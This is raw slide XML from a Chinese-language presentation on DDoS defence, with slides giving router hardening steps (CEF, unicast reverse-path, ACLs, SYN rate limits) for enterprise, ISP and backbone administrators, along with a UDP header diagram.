              <a:t>访问，防服务器</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:ea typeface="楷体_GB2312" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>被</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0">
                <a:ea typeface="楷体_GB2312" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>当肉鸡。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0">
              <a:ea typeface="楷体_GB2312" pitchFamily="49" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14338" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>企业网管理员</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition spd="slow">
    <p:pull/>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p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>二</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>路由器</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>以</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>Cisco</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>路由器为例 </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>Cisco Express Forwarding</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>CEF</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>快速转发）</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>使用 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>unicast reverse-path</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>访问控制列表（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>ACL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>）过滤</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>设置</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>SYN</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>数据包流量速率</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>升级版本过低的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>IOS</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>为路由器建立</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>log server</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23554" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>企业网管理员</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition spd="slow">
    <p:pull/>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normAutofit fontScale="92500"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>ISP / ICP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>为很多中小型企业提供主机托管业务，</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>托管主机安全性普遍很差，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>黑客最喜欢</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>肉鸡</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>，为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>DDoS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>定制</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>托管主机都是高性能、高带宽</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>安全管理差</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>赤膊上阵：基本补丁都没打，</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>ISP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>管理员对托管主机没有直接管理权力</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>，</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>黑客</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>怎么用都不会有被发现的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>危险</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>防</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>DDoS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>时，要特别注意自己管理范围内的客户托管主机不要成为傀儡机。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16386" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>ISP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>ICP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>管理员</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition spd="slow">
    <p:pull/>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normAutofit fontScale="92500" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>骨干运营商联手来解决</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>DDoS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>攻击</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>运营商在自己出口路由器进行源</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>地址验证</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>如在自己路由表中没有到某数据包源</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>的路由，就丢掉该包。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>可阻止伪造源</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>DDoS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>攻击。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>会降低路由器效率，实施很困难。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>把自己网络与主机维护好</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>不让自己主机成为肉鸡</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>受到攻击时尽量保存证据，以便事后追查，维护良好的网络和日志系统</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17410" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>骨干网络运营商</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition spd="slow">
    <p:pull/>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D9113A6E-112D-4CA6-8C9D-7CB8B779C791}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="898989"/>
                </a:solidFill>
              </a:rPr>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1800">
              <a:solidFill>
                <a:srgbClr val="898989"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="138243" name="标题 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>UDP协议</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="43011" name="Freeform 6"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2482850" y="2781300"/>
            <a:ext cx="2232025" cy="433388"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 0 w 4590256"/>
              <a:gd name="T1" fmla="*/ 70947 h 434362"/>
              <a:gd name="T2" fmla="*/ 32 w 4590256"/>
              <a:gd name="T3" fmla="*/ 20780 h 434362"/>
              <a:gd name="T4" fmla="*/ 110 w 4590256"/>
              <a:gd name="T5" fmla="*/ 0 h 434362"/>
              <a:gd name="T6" fmla="*/ 6866 w 4590256"/>
              <a:gd name="T7" fmla="*/ 0 h 434362"/>
              <a:gd name="T8" fmla="*/ 6944 w 4590256"/>
              <a:gd name="T9" fmla="*/ 20780 h 434362"/>
              <a:gd name="T10" fmla="*/ 6976 w 4590256"/>
              <a:gd name="T11" fmla="*/ 70947 h 434362"/>
              <a:gd name="T12" fmla="*/ 6976 w 4590256"/>
              <a:gd name="T13" fmla="*/ 354727 h 434362"/>
              <a:gd name="T14" fmla="*/ 6944 w 4590256"/>
              <a:gd name="T15" fmla="*/ 404896 h 434362"/>
              <a:gd name="T16" fmla="*/ 6866 w 4590256"/>
              <a:gd name="T17" fmla="*/ 425674 h 434362"/>
              <a:gd name="T18" fmla="*/ 110 w 4590256"/>
              <a:gd name="T19" fmla="*/ 425674 h 434362"/>
              <a:gd name="T20" fmla="*/ 32 w 4590256"/>
              <a:gd name="T21" fmla="*/ 404896 h 434362"/>
              <a:gd name="T22" fmla="*/ 0 w 4590256"/>
              <a:gd name="T23" fmla="*/ 354727 h 434362"/>
              <a:gd name="T24" fmla="*/ 0 w 4590256"/>
              <a:gd name="T25" fmla="*/ 7094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90256"/>
              <a:gd name="T40" fmla="*/ 0 h 434362"/>
              <a:gd name="T41" fmla="*/ 4590256 w 4590256"/>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90256" h="434362">
                <a:moveTo>
                  <a:pt x="0" y="72395"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="53195"/>
                  <a:pt x="7627" y="34781"/>
                  <a:pt x="21204" y="21204"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="34781" y="7627"/>
                  <a:pt x="53195" y="0"/>
                  <a:pt x="72395" y="0"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="4517861" y="0"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="4537061" y="0"/>
                  <a:pt x="4555475" y="7627"/>
                  <a:pt x="4569052" y="21204"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="4582629" y="34781"/>
                  <a:pt x="4590256" y="53195"/>
                  <a:pt x="4590256" y="72395"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="4590256" y="361967"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="4590256" y="381167"/>
                  <a:pt x="4582629" y="399581"/>
                  <a:pt x="4569052" y="413158"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="4555475" y="426735"/>
                  <a:pt x="4537061" y="434362"/>
                  <a:pt x="4517861"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en-US" altLang="zh-CN" sz="1500">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode" panose="020B0602030504020204" pitchFamily="34" charset="0"/>
                <a:sym typeface="Lucida Sans Unicode" panose="020B0602030504020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>UDP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1500">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="黑体" pitchFamily="49" charset="-122"/>
                <a:ea typeface="黑体" pitchFamily="49" charset="-122"/>
                <a:sym typeface="黑体" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>源端口</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43012" name="Freeform 7"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2482850" y="3282950"/>
            <a:ext cx="2232025" cy="434975"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 0 w 4590256"/>
              <a:gd name="T1" fmla="*/ 73319 h 434362"/>
              <a:gd name="T2" fmla="*/ 32 w 4590256"/>
              <a:gd name="T3" fmla="*/ 21474 h 434362"/>
              <a:gd name="T4" fmla="*/ 110 w 4590256"/>
              <a:gd name="T5" fmla="*/ 0 h 434362"/>
              <a:gd name="T6" fmla="*/ 6866 w 4590256"/>
              <a:gd name="T7" fmla="*/ 0 h 434362"/>
              <a:gd name="T8" fmla="*/ 6944 w 4590256"/>
              <a:gd name="T9" fmla="*/ 21474 h 434362"/>
              <a:gd name="T10" fmla="*/ 6976 w 4590256"/>
              <a:gd name="T11" fmla="*/ 73319 h 434362"/>
              <a:gd name="T12" fmla="*/ 6976 w 4590256"/>
              <a:gd name="T13" fmla="*/ 366591 h 434362"/>
              <a:gd name="T14" fmla="*/ 6944 w 4590256"/>
              <a:gd name="T15" fmla="*/ 418436 h 434362"/>
              <a:gd name="T16" fmla="*/ 6866 w 4590256"/>
              <a:gd name="T17" fmla="*/ 439910 h 434362"/>
              <a:gd name="T18" fmla="*/ 110 w 4590256"/>
              <a:gd name="T19" fmla="*/ 439910 h 434362"/>
              <a:gd name="T20" fmla="*/ 32 w 4590256"/>
              <a:gd name="T21" fmla="*/ 418436 h 434362"/>
              <a:gd name="T22" fmla="*/ 0 w 4590256"/>
              <a:gd name="T23" fmla="*/ 366591 h 434362"/>
              <a:gd name="T24" fmla="*/ 0 w 4590256"/>
              <a:gd name="T25" fmla="*/ 73319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90256"/>
              <a:gd name="T40" fmla="*/ 0 h 434362"/>
              <a:gd name="T41" fmla="*/ 4590256 w 4590256"/>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90256" h="434362">
                <a:moveTo>
                  <a:pt x="0" y="72395"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="53195"/>
                  <a:pt x="7627" y="34781"/>
                  <a:pt x="21204" y="21204"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="34781" y="7627"/>
                  <a:pt x="53195" y="0"/>
                  <a:pt x="72395" y="0"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="4517861" y="0"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="4537061" y="0"/>
                  <a:pt x="4555475" y="7627"/>
                  <a:pt x="4569052" y="21204"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="4582629" y="34781"/>
                  <a:pt x="4590256" y="53195"/>
                  <a:pt x="4590256" y="72395"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="4590256" y="361967"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="4590256" y="381167"/>
                  <a:pt x="4582629" y="399581"/>
                  <a:pt x="4569052" y="413158"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="4555475" y="426735"/>
                  <a:pt x="4537061" y="434362"/>
                  <a:pt x="4517861"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C729"/>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1500">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="黑体" pitchFamily="49" charset="-122"/>
                <a:ea typeface="黑体" pitchFamily="49" charset="-122"/>
                <a:sym typeface="黑体" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>消息长度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43013" name="Freeform 8"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2482850" y="3760788"/>
            <a:ext cx="4537075" cy="434975"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 0 w 4590256"/>
              <a:gd name="T1" fmla="*/ 73319 h 434362"/>
              <a:gd name="T2" fmla="*/ 19093 w 4590256"/>
              <a:gd name="T3" fmla="*/ 21474 h 434362"/>
              <a:gd name="T4" fmla="*/ 65187 w 4590256"/>
              <a:gd name="T5" fmla="*/ 0 h 434362"/>
              <a:gd name="T6" fmla="*/ 4068026 w 4590256"/>
              <a:gd name="T7" fmla="*/ 0 h 434362"/>
              <a:gd name="T8" fmla="*/ 4114121 w 4590256"/>
              <a:gd name="T9" fmla="*/ 21474 h 434362"/>
              <a:gd name="T10" fmla="*/ 4133206 w 4590256"/>
              <a:gd name="T11" fmla="*/ 73319 h 434362"/>
              <a:gd name="T12" fmla="*/ 4133206 w 4590256"/>
              <a:gd name="T13" fmla="*/ 366591 h 434362"/>
              <a:gd name="T14" fmla="*/ 4114121 w 4590256"/>
              <a:gd name="T15" fmla="*/ 418436 h 434362"/>
              <a:gd name="T16" fmla="*/ 4068026 w 4590256"/>
              <a:gd name="T17" fmla="*/ 439910 h 434362"/>
              <a:gd name="T18" fmla="*/ 65187 w 4590256"/>
              <a:gd name="T19" fmla="*/ 439910 h 434362"/>
              <a:gd name="T20" fmla="*/ 19093 w 4590256"/>
              <a:gd name="T21" fmla="*/ 418436 h 434362"/>
              <a:gd name="T22" fmla="*/ 0 w 4590256"/>
              <a:gd name="T23" fmla="*/ 366591 h 434362"/>
              <a:gd name="T24" fmla="*/ 0 w 4590256"/>
              <a:gd name="T25" fmla="*/ 73319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90256"/>
              <a:gd name="T40" fmla="*/ 0 h 434362"/>
              <a:gd name="T41" fmla="*/ 4590256 w 4590256"/>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90256" h="434362">
                <a:moveTo>
                  <a:pt x="0" y="72395"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="53195"/>
                  <a:pt x="7627" y="34781"/>
                  <a:pt x="21204" y="21204"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="34781" y="7627"/>
                  <a:pt x="53195" y="0"/>
                  <a:pt x="72395" y="0"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="4517861" y="0"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="4537061" y="0"/>
                  <a:pt x="4555475" y="7627"/>
                  <a:pt x="4569052" y="21204"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="4582629" y="34781"/>
                  <a:pt x="4590256" y="53195"/>
                  <a:pt x="4590256" y="72395"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="4590256" y="361967"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="4590256" y="381167"/>
                  <a:pt x="4582629" y="399581"/>
                  <a:pt x="4569052" y="413158"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="4555475" y="426735"/>
                  <a:pt x="4537061" y="434362"/>
                  <a:pt x="4517861"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9639E"/>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1500">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="黑体" pitchFamily="49" charset="-122"/>
                <a:ea typeface="黑体" pitchFamily="49" charset="-122"/>
                <a:sym typeface="黑体" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>数据</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43014" name="Freeform 9"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4787900" y="2781300"/>
            <a:ext cx="2232025" cy="433388"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 0 w 4590256"/>
              <a:gd name="T1" fmla="*/ 70947 h 434362"/>
              <a:gd name="T2" fmla="*/ 32 w 4590256"/>
              <a:gd name="T3" fmla="*/ 20780 h 434362"/>
              <a:gd name="T4" fmla="*/ 110 w 4590256"/>
              <a:gd name="T5" fmla="*/ 0 h 434362"/>
              <a:gd name="T6" fmla="*/ 6866 w 4590256"/>
              <a:gd name="T7" fmla="*/ 0 h 434362"/>
              <a:gd name="T8" fmla="*/ 6944 w 4590256"/>
              <a:gd name="T9" fmla="*/ 20780 h 434362"/>
